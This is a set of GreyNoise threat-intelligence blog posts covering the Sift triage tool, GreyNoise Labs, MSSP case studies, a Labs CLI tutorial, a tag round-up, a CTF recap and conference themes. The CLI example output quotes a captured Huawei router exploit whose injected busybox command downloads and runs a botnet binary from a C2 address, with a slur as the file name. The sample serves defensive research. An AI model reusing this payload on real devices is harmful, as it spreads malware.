Blog
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Introducing Sift: Automated Threat Hunting

TLDR:

GreyNoise is exposing a new internally developed tool, Sift, to the public for the first time. Sift curates a report of new/interesting traffic observed by GreyNoise sensors daily after doing much of the analysis and triage work itself. Check it out at https://sift.labs.greynoise.io/ 

Note that it is a new and experimental feature and will probably have some bugs and change without warning. We will soon be integrating direct marker.io feedback capability. For now, please direct all feedback to labs@greynoise.io. We really want to know what you think!

Figure 1: Example Sift Report

Threat Hunter Pain

There is a lot of traffic bouncing around the internet. Full stop. GreyNoise sees ~2 million HTTP requests (along with tens of millions of events from other protocols) a day. For our on-staff Detection Engineers and your engineers and analysts facing similar loads, analyzing millions of HTTP requests can be extremely tiresome and stressful. 

It’s like looking for a needle in a haystack each day. Most of them are harmless, but some could be hiding malicious activity. It’s a tedious and time-consuming process, constantly payloads of data, and the fear of overlooking something dangerous adds a layer of stress. The task is mentally exhausting, and the perpetual strain can make it a painful experience, with the constant awareness that a single mistake could have serious consequences.

Introducing Sift

To help provide a painkiller, we’ve created Sift. Sift is a workflow that attempts to remove the noise of the background traffic and expose new and relevant traffic. Additionally, it describes the interesting traffic, tells you if it might be a threat, and prioritizes what payloads to look at first. Identification, explanation, and triage all in one tool. 

To achieve this, we employ several advanced DS/ML/AI techniques, such as:

  • custom-built LLMs (Large Language Models)
  • nearest neighbor search and vector databases
  • unsupervised clustering, prompt engineer
  • RAG (Retrieval Augmented Generation), and 
  • querying the state of the art generative models for additional analysis.

The result is a daily report of what GreyNoise sees in our vast sensor network distilled down to only the new items and with built-in analysis to give every defender an immediate look into what is really happening on the internet, no longer needing the luck of an analyst stumbling upon an attack in log traffic.

Currently, it is limited to HTTP traffic, but that won’t last long. It is an experimental feature on the bleeding edge of what is possible, so please bear with us as errors inevitably occur.

Directing Attention

As said earlier, GreyNoise sees millions of HTTP requests a day. After months of experimentation, we found several techniques to record, clean, dedupe, and convert this data into a numerical format for analysis. Applying this to our significant dataset of internet traffic, we’re able to automatically tell you what is new today vs. what we have seen in the last several weeks. This process effectively makes a noise filter for traffic.

In practice, our process takes ~2 million HTTP events down to ~50 per day that require an analyst to look at. Now, we can actually find the needles in our proverbial haystack scientifically and give our analysts a reasonable workload. This reduction in noise has dramatically improved the quantity of new Tags we can generate every week.

Explaining and Sorting

Once we’ve narrowed our focus, we can employ some of the more costly techniques of commercial large language models to help us answer specific questions about the payloads we’re considering. Without giving away all our techniques of how we accomplish it, we can generate an analysis of the payload, potential CVEs, and CPEs associated (which are more up-to-date than any language model), a score of how big of a threat it might be, what GreyNoise knows about the IPs (tags/riot/etc), a score of how confident we are, Suricata queries that might detect similar payloads, as well as keywords, techniques, and technologies affected.

In short, we’re trying to build an entire analyst report on the fly for only things you should look at. Additionally, we sort the reports, so you look at the most critical threats first.

Future Possibilities

Sift is brand new and full of possibilities. You can help flesh those out. We’re currently only exposing daily reports from the last month (excluding the previous week). 

  • Would you like to see more reports? (e.g., Back in time or up to the current date?)
  • More tailored to your organization? (We are rolling out user-hosted sensors where you can get data that a Sift report could eventually filter. More info to come soon..)

Check it out, and thank you for reading!

https://sift.labs.greynoise.io/

Welcome to GreyNoise Labs!

As autumn quickly approaches in the Northern Hemisphere, many people see this as a time to turn inward and prepare for the long winter ahead. However, this is also a time when the lush, uniform green flora around us transforms into a kaleidoscope of colors. This change helps give us all a renewed perspective on what is all around us and fuels both an appreciation for what we have and creativity for what is possible.

Today, GreyNoise is excited to officially announce the emergence of GreyNoise Labs. Keen-eyed GreyNoise users may have noticed our soft launch of this throughout 2023. Back in June, Kimber Duke announced our Labs APIs to the world. The Labs API is a powerful tool designed to provide users quick access to existing and new data we collect and process at GreyNoise via an early access/beta API experience.

Now, like the autumn leaves, we're adding even more color to the existing knowledge and insight that GreyNoise already provides, which governments, critical infrastructure, Fortune 100 enterprises, and security researchers rely on daily to help defend us all against cyberattacks.

What can you expect from GreyNoise Labs?

You already know one of our goals: to provide early access to new data, tools, and insights we're developing — things that may eventually become integrated into our core product but need testing, feedback, and real-world use.

All the teams at GreyNoise provide product, company, community, and emerging threat information via our primary communication channel. This is still the place to keep your finger on the pulse of what's happening at GreyNoise and in the internet threat landscape. If our GreyNoise blog's RSS feed still needs to be added to your favorite newsreader, we highly recommend adding it right now!

That is still the place where critical, actionable information associated with emerging threats will first be published. However, we often need to go deeper into a particular vulnerability or exploit. We also have much more to say on security research projects we're undertaking, data science initiatives we're investigating, and cutting-edge detection engineering concepts we're pioneering.

Our new Grimoire blog (Grimoire RSS) is the place for these deeper dives. We'll make sure to link to them if we have more to say about any emerging threats we direct your attention to on the core blog.

The GreyNoise Labs API is part of our internal Blueprints initiative. Our Product, Design, and Engineering teams build, maintain, and enhance resilient and robust systems/applications you rely on daily. Our Labs team is charged with developing new ways to process and present the data we collect, curate, and compute. These ideas are codified into "blueprints," which are — by definition – "something intended as a guide for making something else." These may take the form of a new Labs API or greynoiselabs command line endpoint, alternate ways to view our data, different idioms for interacting with our core services, or just ways to help you see how we think about the data we work with.

We'll also be regularly updating resources we rely on and giving folks a bit more insight into the team behind GreyNoise Labs. Curious about what we do, what we've published, or the APIs we've made available? Drop us a note at labs@greynoise.io.

MSSPs' Playbook for Success: Balancing Automation and Human Expertise

When it comes to threat intelligence and security operations automation, managed security service providers (MSSPs) face some pretty unique challenges. In our recent webinar, we had the pleasure of hosting two MSSP leaders, Alan Jones and Corey Bussard, who shared their own automation journey. They talked about the hurdles they encountered at the beginning, the value automation brought to the table, and how it has impacted the human element of cybersecurity. Let's dive right in.

 The Problem: Alert Overload

One of the biggest challenges is the overwhelming number of alerts generated by various security tools.  A significant portion of this alert noise originates from inadequate or improperly adjusted threat intelligence feeds. Instead of offering valuable context, many threat intel feeds end up exacerbating false positives and increasing the workload for analysts.  Because MSSPs manage a large number of clients, this challenge is amplified compared to your average company.

The Solution: Trusted Threat Intel + Automation + Human Expertise

In order to overcome the overwhelming amount of noise, these MSSPs recognized the need for improved threat intelligence sources to validate alerts, as well as workflow automation. By validating threat intelligence from trusted providers like GreyNoise, they were able to effectively reduce false positives by swiftly eliminating non-malicious alerts. The implementation of automation for these repetitive analyst tasks and interactions with security tools resulted in a significant boost in overall efficiency.

Key Learnings:

  • Leverage threat intel to validate alerts, not just enrich them. Focus on reducing noise instead of increasing it.
  • Streamline repetitive workflows and tool interactions through automation. This will free up your skilled analysts for non-routine incidents.
  • While cost savings are important, they are not the sole measure of success. It's equally important to assess improvements in the time to resolution (MTTR), capacity gains, and analyst churn.

By combining automation with high-fidelity threat intelligence, these MSSPs were able to streamline their operations and empower their analysts to focus on the most critical threats.

A big thank you goes out to Alan and Corey for graciously sharing their automation journey. They did an exceptional job of explaining the immense value of automation, as well as underscoring the crucial role that the human element plays in their success. We highly encourage you to watch the full webinar on-demand and gain valuable insights from these industry leaders.

mssp-webinar-cta

Fast-Tracking Innovation: GreyNoise Labs Experimental CLI

Introducing the GreyNoise Labs Python CLI package: a robust toolkit for advanced users seeking to maximize the potential of our experimental Labs services.

Cybersecurity data analysis is a complex and rapidly evolving landscape. To stay ahead, power users need tools that offer swift and accurate data handling. That's where the new GreyNoise Labs CLI package comes in. Crafted to optimize the parsing and manipulation of our sensor datasets, this CLI will not only expedite your process but also deliver digestible insights right at your fingertips.

Diving Into The Toolkit

The package serves as a conduit to the GreyNoise Labs API service, facilitating direct access to raw sensor data, contextual metadata, and quick prototyping utilities. This powerful Python package is your key to unlocking a simpler, more efficient interaction with our Labs API.

The GreyNoise Labs API contains the top 1% of data for all queries. However, the fluid nature of our continuous iteration and experimentation means that queries and commands can change without prior notice, and a rate limit is in place for equitable usage. While these utilities are primarily intended for us to explore new concepts and gather valuable user feedback, you're welcome to use them. We do caution against integrating them directly into production tools.

Our objective is to identify and prioritize new product features through these experimental iterations and your feedback. This exploratory process allows us to deliver features that not only cater to your specific needs, but also seamlessly integrate with our products.

For more insight into GreyNoise Labs and the work we're doing, visit our official website.

Installing ‘greynoiselabs’

The CLI installation process is straightforward:

  1. Run python3 -m pip install greynoiselabs
  1. Run greynoiselabs init to authenticate with Auth0 (what we use for secure authentication for your GreyNoise account) and save your credentials for future use.

As an optional step, we recommend installing jq to enhance the readability of CLI output. You can install jq with brew install jq on macOS or apt-get install jq on Ubuntu.

Quick Start Guide

Once installed, you can explore the features of the CLI by running greynoiselabs, which provides a handy usage guide.

image showing output of running greynoiselabs without options

Furthermore, you can access command-specific help using greynoiselabs <command> --help.

image showing help for greynoiselabs knocks

These commands can help you explore a variety of rich datasets released by GreyNoise Labs. Remember, the data is easily parseable with jq, which can help you extract insights and filter results to suit your specific needs. Some examples of jq usage are provided later on.

# This gives a JSON response containing data about specific source IPs.
greynoiselabs c2s | jq

{
  "source_ip": "1.2.3.4",
  "hits": 2024,
  "pervasiveness": 10,
  "c2_ips": [
    "5.6.7.8"
  ],
  "c2_domains": [],
  "payload": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n…$(/bin/busybox wget -g 5.6.7.8 -l /tmp/negro -r /.oKA31/bok.mips; /bin/busybox chmod 777 /tmp/negro; /tmp/negro hw.selfrep)…\r\n\r\n"
}
# This command provides insights into knocks on specific source IPs.
greynoiselabs knocks | jq
{
  "source_ip": "36.70.32.117",
  "headers": "{\"Content-Type\":[\"text/html\"],\"Expires\":[\"0\"],\"Server\":[\"uc-httpd 1.0.0\"]}",
  "apps": "[{\"app_name\":\"Apache HTTP Server\",\"version\":\"\"}]",
  "emails": [],
  "favicon_mmh3_128": "Sgqu+Vngs9hrQOzD8luitA==",
  "favicon_mmh3_32": -533084183,
  "ips": [
    "10.2.4.88",
    "10.2.2.88"
  ],
  "knock_port": 80,
  "jarm": "00000000000000000000000000000000000000000000000000000000000000",
  "last_seen": "2023-07-21T11:00:06Z",
  "last_crawled": "2023-07-22T00:14:27Z",
  "links": [],
  "title": "NETSurveillance WEB",
  "tor_exit": false
}
# This shows the most popular IPs.
greynoiselabs popular-ips | jq
{
  "ip": "143.244.50.173",
  "request_count": 916,
  "users_count": 95,
  "last_requested": "2023-07-27T23:55:17Z",
  "noise": true,
  "last_seen": "2023-07-27T23:59:11Z"
 }
# This allows you to see the noise ranking of a specific IP.
greynoiselabs noise-rank | jq
{
  "ip": "167.94.138.35",
  "noise_score": 89,
  "country_pervasiveness": "very high",
  "payload_diversity": "med",
  "port_diversity": "very high",
  "request_rate": "high",
  "sensor_pervasiveness": "very high"
}
# This uses a GPT prompt to generate different results on each run.
greynoiselabs gengnql "Show malicious results that are targeting Ukraine from Russia"

classification:malicious AND metadata.country:Russia AND destination_country:Ukraine
    metadata.country:Russia AND destination_country:Ukraine AND classification:malicious
    metadata.country_code:RU AND destination_country_code:UA AND classification:malicious
    classification:malicious AND metadata.country_code:RU AND destination_country_code:UA
    destination_country:Ukraine AND metadata.country:Russia AND classification:malicious

Advanced Usage

jq is a versatile tool for handling JSON data from the command line. Here are a few examples using the JSON outputs above that could provide some interesting insights. Note that these examples are based on the provided samples and may need to be adjusted based on the actual structure and content of your data.

Get a count of all unique C2 IPs

If you wanted to see how many unique C2 IPs exist in your dataset, you could run:

greynoiselabs c2s | \
  jq -s '[.[].c2_ips[]] | \
  unique | \
  length'
149


which retrieves all the C2 IPs (.[].c2_ips[]), finds the unique values (unique), and then counts them (length).

Identify IPs with high hit counts

If you're interested in the source IPs with high hit counts, you could use a command like:

greynoiselabs c2s | \
  jq 'select(.hits > 1000) |\
  .source_ip'
"141.98.6.31"
"194.180.49.165"
"45.88.90.149"
"59.7.196.80"
"61.78.140.229"
"211.194.241.110"
"121.185.173.56"

This filters the data to only include records where the hits are greater than 1000 (select(.hits > 1000)), and then outputs the corresponding source IPs (source_ip).

Grouping by Noise Score

If you wanted to see how many IPs fall into different categories based on their noise score, you could run:

greynoiselabs noise-rank | \
  jq -s 'group_by(.noise_score) | \
  map({noise_score: .[0].noise_score, count: length})'
[
  {
    "noise_score": 40,
    "count": 181
  },
  {
    "noise_score": 41,
    "count": 200
  },
  {
    "noise_score": 42,
    "count": 171
  }
]

This command groups the data by the noise score (group_by(.noise_score)), and then transforms it into an array with each object containing the noise score and the count of IPs with that score (map({noise_score: .[0].noise_score, count: length})).

Identify All Noiseless Popular IPs

If you wanted to see all popular IPs that are not observed by GreyNoise sensors, you could use:

greynoiselabs popular-ips | \
  jq '. | \
  select(.noise == false) | .ip'
"13.107.138.8"
"87.103.240.204"
"91.243.167.69"
"13.107.136.8"
"204.79.197.200"
"194.145.175.59"
"52.113.194.132"
"189.95.160.50"

This command filters the data to only include records where the noise is false (select(.noise == false)), and then outputs the corresponding IPs (ip).

Aggregate KnockKnock Source IPs by HTTP Title

For a glimpse into the distribution of page titles across your network traffic, use.

greynoiselabs knocks | \
  jq -s 'map(select(.title != "")) | \
  group_by(.title) | \
  map({title: .[0].title, source_ips: map(.source_ip), ip_count: length}) | \
  sort_by(-.ip_count)'
[
  {
    "title": "RouterOS router configuration page",
    "source_ips": [
      "103.155.198.235",
      "185.99.126.15",
   …
      "103.58.251.213"
    ],
    "ip_count": 81
  },
  {
    "title": "main page",
    "source_ips": [
      "220.84.204.83",
      "118.37.197.253",
     …
      "119.200.155.99"
    ],
    "ip_count": 58
  },
 …
]]

This command does the following:

  • map(select(.title != "")): Filters out the objects that have an empty title.
  • group_by(.title): Groups the remaining objects by their title.
  • map({title: .[0].title, source_ips: map(.source_ip), ip_count: length}): Transforms the grouped data into an array of objects, each containing a title, an array of associated source IPs, and a count of those IPs (ip_count).
  • sort_by(-.ip_count): Sorts the array of objects based on the ip_count in descending order.

By grouping the 'knocks' data based on the title, this updated command allows you to quickly identify which titles have the most associated source IPs. The result is sorted by the ip_count field, giving you an ordered view from most to the least associated IPs for each title.

The Power Of Data

Finally, with this, you can start to see the power of this data. The first result is a list of IPs likely running Mikrotik routers, that are scanning and crawling the internet and likely related to one or more botnets. Our knockknock dataset has a bunch of granular signature information that could be used to further identify clusters of similar IPs. We will have more on this in a future blog post.

These are just a few examples of what you can do with jq and the new GreyNoise Labs CLI output data. By adjusting these examples to your needs, you can glean a multitude of insights from your data and ours.

As we continue to evolve and expand the functionality of the GreyNoise Labs API and CLI, we are eager to hear your feedback. Your input is critical in helping us understand which features are most valuable and what other capabilities you'd like to see included.

Please don't hesitate to reach out to us with your feedback, questions, or any issues you may encounter at labs@greynoise.io. Alternatively, you can also create an issue directly on our GreyNoise Labs GitHub page. If you have ideas about ways to combine our data into a more useful view or are interested in somehow partnering with a dataset you have, please reach out.

We can't wait to see what you'll discover with the GreyNoise Labs CLI. Get started today and let us know your thoughts!

While our Labs API data is spiffy, you, too, can take advantage of our core data science-fueled threat intelligence platform to identify noise, reduce false positives, and focus on genuine threats. Sign up for GreyNoise Intelligence today and gain the edge in protecting your systems.

Data Science-Fueled Tagging From GreyNoise Last Week

All our tags come from extremely talented humans who painstakingly craft detection rules for emergent threats that pass our “100%” test every time. We tend to rely on research partner shared proof-of-concept (PoC) code or vendor/researcher write-ups to determine when we should direct our efforts. Sometimes, prominent, emergent CVEs will cause us to dig into the patch diffs ourselves, fire up vulnerable instances of the software, and determine likely exploit paths which we wait to see are correct.

However, we receive millions of just HTTP/HTTPS events every single day. Deep within that noise we know that exploitation attempts for other services exist, but surfacing ones that may matter is a challenge since we're only human. Thankfully, we also spend some of our time on data science projects that help fuel innovation. You've seen the results of those efforts in our IP Sim and Tag Trends platform features. But, we have many internal data science projects that are designed to give our researchers bionic tagging powers; enabling each of them to be stronger, better, and faster when it comes to identifying novel traffic and understanding whether it is malicious or not (and, whether it warrants a tag).

One of these tools is “Hunter” (yes, the Labs team is quite unimaginative when it comes to internal code names). It performs a daily clustering of HTTP/HTTPS traffic, sifting through those millions of events, and surfaces a very manageable handful of clusters that our dedicated team can easily and quickly triage. Hunter also has a memory of past clusters, so it will only surface “new” ones each day.

Last week was bonkers when it comes to the number of tags (7) our team cranked out.

One reason for that Herculean number is due to Hunter! It led us down the path to finding activity that we might have otherwise only tagged in the future when organizations or agencies announced exploit campaigns that did real harm to those who fell victim to attack.

In the tag round-up for last week, below, we note where Hunter was the source for the creation of the tag with a “🔍”.

A trio of tags for SonicWall

SonicOS TFA Scanner 🔍

The SonicOS TFA Scanner tag identifies IP addresses scanning for the SonicWall SonicOS Two Factor Authentication (TFA) API endpoint. So far, we've observed 503 unique IP addresses from benign scanners searching for this endpoint. For more information and to explore the data, check out the GreyNoise Visualizer for SonicOS TFA Scanner.

SonicWall Auth Bypass Attempt

This tag is related to IP addresses attempting to exploit CVE-2023-34124, an authentication bypass vulnerability in SonicWall GMS and Analytics. No exploit attempts have been observed so far. For more details, visit the GreyNoise Visualizer entry for SonicWall Auth Bypass Attempt.

SonicWall SQL Injection Attempt

We've observed one malicious IP address attempting to exploit CVE-2023-34133, a SonicWall SQL Injection vulnerability. So far, we've seen one IP — 94[.]228[.]169[.]4 poking around for vulnerable instances. — To learn more about this tag and the associated data, have a look at the GreyNoise Visualizer entry for SonicWall SQL Injection Attempt.

A dastardly dynamic duo for Ivanti

Ivanti MICS Scanning

This tag is associated with IP addresses scanning for Ivanti MobileIron Configuration Services (MICS). As of now, we haven't seen any IPs attempting to exploit this vulnerability. To dive deeper into this tag, visit the GreyNoise Visualizer for Ivanti MICS Scanning.

Ivanti Sentry Auth Bypass Attempt

IP addresses with this tag have been observed attempting to exploit CVE-2023-38035, an authentication bypass vulnerability in Ivanti Sentry, formerly known as MobileIron Sentry, versions 9.18 and prior. No exploit attempts have been observed to date. Explore this tag further on the GreyNoise Visualizer entry for Ivanti Sentry Auth Bypass Attempt.

Solo tags

Openfire Path Traversal Attempt activity

IP addresses with this tag have been observed attempting to exploit CVE-2023-32315, a path traversal vulnerability in Openfire's administrative console. We've caught seven IPs attempting to find paths they should not be. You can check those out at the GreyNoise Visualizer entry for Openfire Path Traversal Attempt

TBK Vision DVR Auth Bypass activity 🔍

Finally, IP addresses with this tag have been observed attempting to exploit CVE-2018-9995, an authentication bypass vulnerability in TBK DVR4104 and DVR4216 devices. Looking back at the past 30 days of data, we found 66 IPs looking for these streaming systems. You can find them all at the GreyNoise Visualizer entry for TBK Vision DVR Auth Bypass

So What?

The earlier we can find and tag new, malicious activity, the more quickly our customers and community members can take advantage of our timely threat intelligence to either buy time to patch systems and block malicious activity.

You, too, can take advantage of our data science-fueled threat intelligence platform to identify noise, reduce false positives, and focus on genuine threats. Sign up for GreyNoise Intelligence today and gain the edge in protecting your systems.

Do you have a tag that you want GreyNoise to look into? You are in luck! We now have a page for our Community to request a tag. Check it out.

Top 3 Benefits MSSPs & MDRs Receive With GreyNoise

“If we had budget cuts we’d turn off someone else in favor of GreyNoise. We could not get the same answers in the same time elsewhere.”

– Director of Cyber Operations at 5,001-10,000 employee company

Many traditional threat intelligence solutions used by MSSPs can have an unintended consequence of creating more noise for your security operations center (SOC) – GreyNoise changes that. We collect and analyze internet wide scan and attack traffic, and label noisy IPs and network activity (whether it's common business services, or scanners crawling/exploiting the internet) to help SOC teams spend less time on irrelevant or harmless activity, and more time on targeted and emerging threats.

GreyNoise integrates seamlessly into over 50 different security tools, eliminating the need for security professionals to adapt to new dashboards, switch between multiple platforms, or navigate additional graphical user interfaces. This enables MSSPs to materially improve their security operations and workflows, often saving them hours of analyst time per week and upwards of 25% on costs.

In our last post, we introduced three critical ways MSSP and MDR customers benefit from GreyNoise: 1) reduce costs 2) improve scalability and 3) beat the adversary. 

In this post, we will take a deeper look at exactly HOW existing GreyNoise MSSP customers are realizing these benefits.

1. Reduce Costs

As threat landscapes evolve, so does the cost of staying ahead. More security alerts often result in a need for more headcount, and when MSSPs are already operating on narrow margins – this becomes quite the challenge.  

Over at Ideal Integrations, a well-known regional MSSP, they faced two costly challenges:

  1. An expensive alert problem: The sheer volume of security alerts their teams were ingesting was overwhelming, compounded by a high rate of false positives – all of which was costing them time, money, and quality of service.
  1. Difficulty in IP investigations: Understanding an IP address and its relation to broader threat patterns is crucial – and their existing tooling was not providing this level of trusted, reliable context fast, causing an overall inefficient analyst workflow and a drain on resources.

By integrating GreyNoise into Swimlane, their Security Orchestration, Automation & Response platform (SOAR), the Ideal Integrations team was now able to take each alert, ask GreyNoise (via API) for a temperature check on that IP Address, and immediately enrich it with GreyNoise-provided context – enabling a trusted, reliable verdict quickly. With the decision and reasoning directly available in their alert systems, the analysts no longer needed to bounce between different platforms to collate results, streamlining the incident response process. 

“We used to take around 15 - 45 minutes to investigate each event to find out if the intelligence was accurate, and finally make a determination as to a verdict. That is time we now save with GreyNoise, per event, and it adds up very quickly to help justify any expense. It allowed us to pivot our efforts to higher level tasks, and saved us from having to hire exponentially more analysts just to keep up with the inbound events.” 
— VP of Security Services, Ideal Integrations

2. Improve Scalability

In today's market, scaling is not enough. For MSSPs in particular, it is all about scaling sustainably – growing your customer base without increasing your costs.

Hurricane Labs, a leading Splunk MSSP shop, had brought together a team of Splunk ninjas who were second-to-none in managing the Enterprise Security and Phantom deployments on behalf of their customers. However, as they added more detections and new customers, they naturally saw their alert volumes grow.

To enrich and filter out noisy alerts in both Splunk and Phantom, Hurricane Labs installed the GreyNoise integration into their customers’ Splunk environments and added it to the workflows for various detections. The logic was straightforward: if something in the search results matched GreyNoise, exclude. 

For a normal enterprise business, the SOC manager has a couple of choices to handle alerts: he or she can hire a person, or spend money on a product that improves alert quality. But for an MSSP, the margins are often paper thin – and that’s where GreyNoise is even more valuable.

“Any single analyst can handle, say, 20 alerts per day. But a product like GreyNoise can triage alerts for every one of our customers. So as we add more customers, GreyNoise scales in a way a person can’t.”
— Director of Managed Services, Hurricane Labs

3. Beat the Adversary

The adversary is evolving its tactics and techniques faster than ever, making it critical for MSSPs and MDRs to have sufficient tooling and insights to stay ahead. One part of this equation is the need for explainability and context paired with threat intelligence, and the other is visibility into emerging vulnerabilities and associated attack vectors – especially with “vulnerability exploit” now cited as a top attack vector (Verizon DBIR).

MSSPs like Layer 3 Communications & Ideal Integrations leverage GreyNoise data to help them prioritize threats and vulnerabilities based on the absence or presence of “in the wild” exploitation. During the height of vulnerability events, GreyNoise also serves critical in providing customers with the “most comprehensive set of intelligence” through high fidelity blocklists. Organizations can prevent noisy scanners from hitting their perimeter from the onset, effectively shutting them out, and giving themselves time to patch when there is an emerging exploit.  This allows GreyNoise MSSP and MDR customers to tighten the window of opportunity for attackers and ultimately improve the overall security posture of their end clients.

Conclusion

With a unique suite of tools and insights, GreyNoise is truly an opportunity for every MSSP and MDR to transform their offerings with a threat intelligence solution that pays for itself.


That is why we are excited to invite you to our upcoming webinar, "Alerts, Automation, & Analysts: How MSSPs Can Leverage Automation to Reduce Alerts & Maximize their Analysts." This webinar will feature an expert panel of MSSP & MDR leaders from real GreyNoise customers, providing valuable insights and strategies. 

Don't miss out on this opportunity to learn from industry experts real-time, and see how GreyNoise is shaping the future of sustainable, scalable and innovative cybersecurity service delivery.

Webinar Event for Alerts, Automation, & Analysts: How MSSPs Can Leverage Automation to Reduce Alerts & Maximize their Analysts.

GreyNoise NoiseFest 2023 CTF Recap

The GreyNoise Labs team is proud to have hosted the GreyNoise NoiseFest 2023 CTF - who knows if we will do it again, but we had fun, so here’s a walkthrough on how and why we did it.

But first: your winners!! 

  • 1st: t3mp3st w/ 4060 points in 5 days, 2 hours, 24 minutes and 19 seconds
  • 2nd: An00bRektn w/ 3060 points in 1 day, 2 hours, 9 minutes and 57 seconds
  • 3rd: jk42 w/ 3060 points in 19 hours, 35 minutes and 27 seconds
  • 4th: mtaggart w/ 3060 points in 1 day, 0 hours, 24 minutes and 18 seconds
  • Honorable Mention: MyDFIR for the early lead 

We’re incredibly proud of everybody who even attempted to play - all 280 participants! Our community team has contacted the winners, and they will be receiving some sweet swag as a prize, plus 1st, 2nd, and 3rd places are getting a beautiful trophy.

Crafting the CTF was one of the best parts of hosting the competition. Competitors in the CTF may have noticed that there was no usage of GreyNoise - and that was by design. When we thought about all the cool things we do daily on the Labs team, we narrowed it down to around 25 tags with CVEs that have led us down rabbit holes or taught us something interesting about how the internet works.

We used these selected examples and packaged them in industry standard PCAP format and set our community loose on the CTF challenges. This allowed us to observe the methods, tools, and pain points in dealing with network traffic that may defy typical expectations. We know that this format of network capture is the highest level of proof that something occurred - the direct record of bytes on the wire. A detection engineer is not only familiar with PCAP but may even live in it daily, noticing how bytes live and breathe just as the GreyNoise Labs team does.

Our new sensor fleet also captures full PCAP, and we wanted to hype that fact! Any difficulties encountered with a single-packet CTF challenge will be grossly exacerbated when working with millions of real-world packets. We’re greatly looking forward to analyzing the pain points from this CTF and providing the tooling that our Detection Labs team and the community need to make network analysis a pleasure to work with. Your feedback has been heard!

(The final scoreboard)

So we learned some things about hosting a CTF - mainly that creating “medium level” challenges in a PCAP-based CTF is hard. We also learned that we like trivia - the challenge “fullsignature” is an excellent example of this, where the answer was the name of the patent holder and original author for the MSMQ protocol. Most importantly, we learned that our community is SUPER SMART in PCAP. Some of the players have done writeups already (this one by An00bRektn, or this one by t3mp3st), and if you’d like to walk through the challenges yourself, we’ve uploaded the challenges and associated PCAP to GitHub at https://github.com/GreyNoise-Intelligence/NoiseFest-CTF-2023/ 

Altogether, we learned a lot from this experience and had a great time crafting and solving each other’s challenges here on the GreyNoise Labs team. We look forward to hosting again! 

Recurring Themes Present (And Missing) From Hacker Summer Camp

Cybersecurity digerati spends an inordinate amount of time focusing on the concept of “biggest” when it comes to cybersecurity threats. While there is some merit to such quantification, the concept itself can be difficult to generalize, since every organization has some set of unique characteristics that cause each of them to have fairly unique threat profiles, risk tolerances, and exposures. 

We can, however, break down some of the broader themes from Black Hat and DEF CON 2023 and pull out some recurring themes across each that would cause some consternation for CISOs, CIOs, CEOs, and board members (since many of them are now on the hook when cyber things go south).

Recurring - Theme 1: Insecure By Default CPUs

Meltdown, Spectre, and L1 Terminal Fault (Foreshadow) may be behind us, but modern processor architectures seem to be in a permanent state of vulnerability. Downfall is yet another one in this line of low-level flaws that require significant effort to mitigate, as said mitigations usually require some downtime and also some inherent risk in the patch processes themselves. 

Fixing these vulnerabilities also may cause significant performance degradation, which may force organizations to incur extra spend to meet pre-projected capacity requirements.

C-suite folks are left with a gnarly, tangled risk assessment process that has to consider the likelihood and frequency of projected attacks and also the potential impact on various compliance requirements if they choose not to patch/mitigate.

This is a major distraction from delivering on core business functions, and we’re likely to see more of these types of vulnerabilities in the future, especially with the scramble to acquire GPUs. CVE-2022-31606, CVE-2021-1074, and CVE-2021-1118 are already known vulnerabilities in GPUs, and the rush to meet AI headfirst may see a parallel set of headaches on the horizon in any systems that are performing advanced ML/AI processing.

Recurring - Theme 2: Trouble In The Cloud

It’s no secret that an ever-increasing number of organizations are moving some or many workflows to cloud environments, joining the ranks who have blazed the trail before them. There was supposed to be some inherent level of trust in cloud providers to take security seriously, so all an organization had to do was ensure they didn’t mess up their configs or expose vulnerable services. Sadly, that has not been the case for some time now.

The specifics of what were presented at or before Hacker Summer Camp in this space really aren’t as important as the theme itself: you can no longer even remotely have any baseline level of assurance that the cloud environments you are adopting are taking security measures seriously.

This puts C-suite folks in a precarious position. While some cloud plans end up going over budget, there are many cloud use cases that do help organizations save time, money, and people resources. Yet, when you are put at serious risk due to negligence on the part of a cloud provider you have the potential of incurring significant costs for triage, incident response, and potentially data breach penalties.

2023 has made it pretty clear that “In Cloud, We Trust” is unlikely to ever be a motto again (if it ever was). Organizations now have extra complexity both up-front (as they bake in extra security measures and potential incident costs into new endeavors) and also as they handle the distraction of retrofitting a more defensive security posture onto systems that were likely more secure when they were hosted back in the “owned data center” days.

Recurring - Theme 3: AI Insecurity

There has been enough discussion about “AI insecurity” ever since just around this time last year, so I can keep this relatively brief.

The large language/generative models (LLM/GPTs) we seem to be stuck working with were all trained with no thought for safety — either in the results one gets when using them, or for how easy it is to cause them to reveal information they shouldn’t.

They also come with an equivalent to the “cloud” problem mentioned above, since most organizations lack the skill and resources necessary to bring AI fully in-house. 

This is a big topic of discussion when I talk to CISOs in my lectures at CMU. The AI gold rush is causing organizations to incur significant, real risk, and there are almost no tools, processes, guides, or bulk expertise to help teams figure out ways to keep their data, systems, and humans safe from AI exposures.

This is yet one more distraction, and focus grabber that makes it very difficult to just get “normal” cybersecurity practices done. Unless the bottom falls out of generative AI as it has with the web3/crypto fad that came before it, the C-suite will have to dedicate what little time and resources they have to corralling and shaping AI use across the organization.

Missing - Theme 4: The Vulns Start Coming And They Don’t Stop Coming

There were many talks about vulnerabilities in general at both Hacker Summer Camp and RSA this year. But, I don’t think any talk made the brutal reality of what it is like to perform the thankless task of vulnerability management within even a moderately sized organization.

calendar view of CISA KEV Releases

That calendar view has a colored square every time there’s been a CISA Known Exploited Vulnerability release since CISA began curating their catalog. Apart from the regular mega “Patch Tuesday” organizations have to deal with, they also have to contend with nigh immediate response to each new update, even if that’s only a triage event. There is little time in-between updates, and very common technologies/products make their way to the list on-the-regular.

Six weeks before Black Hat, there was at least one, major vulnerability in a core component of most enterprise IT stacks every week, with rapid and devastating malicious attacks following close behind each release.

This is an untenable situation for most organizations, even “resource rich” ones.

Hundreds (one estimate, today, said “thousands”) of organizations have been devastatingly hurt by MOVEit exploits, Citrix admins likely cannot sleep at night anymore, and even security teams have had to face an onslaught of patches for technology they’re supposed to be using to keep their organizations safe.

